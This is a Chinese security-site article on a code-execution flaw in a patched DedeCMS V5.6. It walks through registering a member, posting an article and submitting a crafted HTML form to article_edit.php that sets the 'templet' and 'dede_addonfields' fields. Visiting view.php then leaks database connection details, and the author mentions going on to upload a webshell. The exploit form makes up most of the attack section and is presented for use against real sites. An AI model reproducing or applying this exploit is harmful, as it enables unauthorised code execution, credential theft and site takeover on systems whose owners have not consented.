热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

DEDE代码执行漏洞真的修复好了吗

发布时间:2010-11-10 20:07文章来源:黑白前线文章作者:udb311 点击次数:
摘要:主题:DEDE代码执行漏洞真的修复好了吗 图文/过客 来源:黑白前线 今天碰到最新版本的V5.6补丁过的程序来测试下吧。 查看版本: 漏洞发布已经很早了 见 http://www.hackline.net/a/news/ldfb/web/2010/0923/5875.html 条件:开启会员投稿功能。 1、查看首页...

主题:DEDE代码执行漏洞真的修复好了吗

图文/过客  来源:黑白前线

 

 

今天碰到最新版本的V5.6补丁过的程序来测试下吧。

查看版本:


 


漏洞发布已经很早了

http://www.hackline.net/a/news/ldfb/web/2010/0923/5875.html

条件:开启会员投稿功能。


1、查看首页无会员登录与注册,输入http://site/member/login.php可跳到登录注册页。

2、注册后登录,发表文章。

3、修改构造本地EXP:
 

  1. <form class="mTB10 mL10 mR10" name="addcontent" id="addcontent"   
  2. action="http://site/member/article_edit.php" method="post" enctype="multipart/form-data"   
  3. onsubmit="return checkSubmit();"> 
  4. <input type="hidden" name="dopost" value="save" /> 
  5. <input type="hidden" name="aid" value="13217" /> 
  6. <input type="hidden" name="idhash" value="594d06179df5b113715c4ced74440a21" /> 
  7. <input type="hidden" name="channelid" value="1" /> 
  8. <input type="hidden" name="oldlitpic" value="" /> 
  9. <input type="hidden" name="sortrank" value="1289385860" /> 
  10. <div id="mainCp"> 
  11. <h3 class="meTitle"><strong>修改文章</strong></h3> 
  12. <div class="postForm"> 
  13. <p class="cellBg"> 
  14. <label>标题:</label> 
  15. <input name="title" type="text" id="title" value="te`1" maxlength="100" class="intxt"/> 
  16. </p> 
  17. <p> 
  18. <label>标签TAG:</label> 
  19. <input name="tags" type="text" id="tags" value="" maxlength="100" class="intxt"/>(用逗号分  
  20. 开)   
  21. </p> 
  22. <p class="cellBg"> 
  23. <label>作者:</label> 
  24. <input type="text" name="writer" id="writer" value="aer" maxlength="100" class="intxt"   
  25. style="width:219px"/> 
  26. </p> 
  27. <p> 
  28. <label>隶属栏目:</label> 
  29. <select name='typeid' size='1'> 
  30. <option value='121' class='option3' selected=''>会员投稿</option> 
  31. </select> <span style="color:#F00">*</span>(不能选择带颜色的分类)  
  32. </p> 
  33. <p class="cellBg"> 
  34. <label>我的分类:</label> 
  35. <select name='mtypesid' size='1'> 
  36. <option value='0' selected>请选择分类...</option> 
  37. </select> </p> 
  38. <p class="cellBg"> 
  39. <label>缩略图:</label> 
  40. <input name="litpic" type="file" id="litpic" onchange="SeePicNew('divpicview',this);"   
  41. maxlength="100" class="intxt"/> 
  42. </p> 
  43. <input type='text' name='templet'value="/uploads/userup/23/12R2L262-BL.jpg"> 
  44.  
  45. <input type='text' name='dede_addonfields' value="templet,htmltext;"> 
  46. </div> 
  47. <!-- 表单操作区域 --> 
  48. <h3 class="meTitle">详细内容</h3> 
  49. <div class="contentShow postForm"> 
  50. <p> 
  51. <input type="hidden" id="body" name="body" value="" style="display:none" /><input   
  52. type="hidden" id="body___Config" value="FullPage=false&amp;EnableXHTML=true&amp;EnableSourceXHTML=true"   
  53. style="display:none" /><iframe id="body___Frame" src="/include/FCKeditor/editor/fckeditor.html?  
  54. InstanceName=body&amp;Toolbar=Member" width="100%" height="350" frameborder="0"   
  55. scrolling="no"></iframe> </p> 
  56. <p class="cellBg"> 
  57. <label>验证码:</label> 
  58. <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt"   
  59. style='width:50px;text-transform:uppercase;' /> 
  60. <img src="http://site/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle"   
  61. style="cursor:pointer" onclick="this.src=this.src+'?'" /> 
  62. </p> 
  63. <p> 
  64. <button class="button2" type="submit">提交</button> 
  65. <button class="button2 ml10" type="reset" onclick="location.reload();">重置</button> 
  66. </p> 
  67. </div> 
  68. </div> 
  69. </form> 
  70.  

4、测试代码执行,访问http://site/plus/view.php?aid=13217如图所示

漏洞检测2

成功返回数据库连接信息。


 

5、可惜MYSQL不支持外连,继续利用上传拿shell。

标签分类: 渗透技巧 代码执行

上一篇:phpaa后台拿shell方法
下一篇:%69d分析绕过防注入